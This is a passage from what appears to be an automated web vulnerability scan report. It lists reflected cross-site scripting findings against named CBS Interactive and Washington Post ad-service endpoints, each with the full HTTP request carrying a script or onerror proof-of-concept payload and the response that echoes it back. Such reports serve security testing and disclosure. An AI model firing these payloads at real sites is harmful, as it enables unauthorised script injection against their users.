Set-Cookie: recs-98b44cb774fd02fd18559597da304954="bPmNSD4EdkQfTcxXO3IbzODj1tUcqGdac9Y1u51O9pcWTxMsM4Sk+CRl0Q8Po4rSMcGqA6kc4x3UMdgdNIMGwS2VLb3EJlEUkzVk0Zh4eYV1v5FjLMguSOtw5rpmzPNIhDKxqp7mHEZ5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 14-Feb-2011 01:41:20 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 9775

outbrain_rater.returnedOdbData({'response':{'exec_time':25,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'187236313','req_id':'0d5dd9641c563b2519e3826e3e34503f'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','defaultRecNumber':5}}},0)a0654<script>alert(1)</script>49c55aa1899

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers-service.cbsinteractive.com
Path:   /offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the HTML document as plain text between tags. The payload 4b9c2<script>alert(1)</script>e6884640a74 was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/script.sc?offerId=864b9c2<script>alert(1)</script>e6884640a74 HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 88
Date: Mon, 14 Feb 2011 01:39:38 GMT

// Offer id 864b9c2<script>alert(1)</script>e6884640a74 does not exists or is not ACTIVE

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload f4578<script>alert(1)</script>ead23a8fea2 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:01 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1203

jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","date
...[SNIP]...

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the assocId request parameter is copied into the HTML document as plain text between tags. The payload b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1 was submitted in the assocId parameter. This input was echoed as b9198<img src=a onerror=alert(1)>2e70df75fb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:05 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20b9198<img src=a onerror=alert(1)>2e70df75fb1","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","key
...[SNIP]...

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the commercialNode request parameter is copied into the HTML document as plain text between tags. The payload 65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8 was submitted in the commercialNode parameter. This input was echoed as 65d5f<img src=a onerror=alert(1)>139c3531da8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:09 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1250

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics65d5f<img src=a onerror=alert(1)>139c3531da8","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":
...[SNIP]...

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload ec713<img%20src%3da%20onerror%3dalert(1)>307e13bd033 was submitted in the container parameter. This input was echoed as ec713<img src=a onerror=alert(1)>307e13bd033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request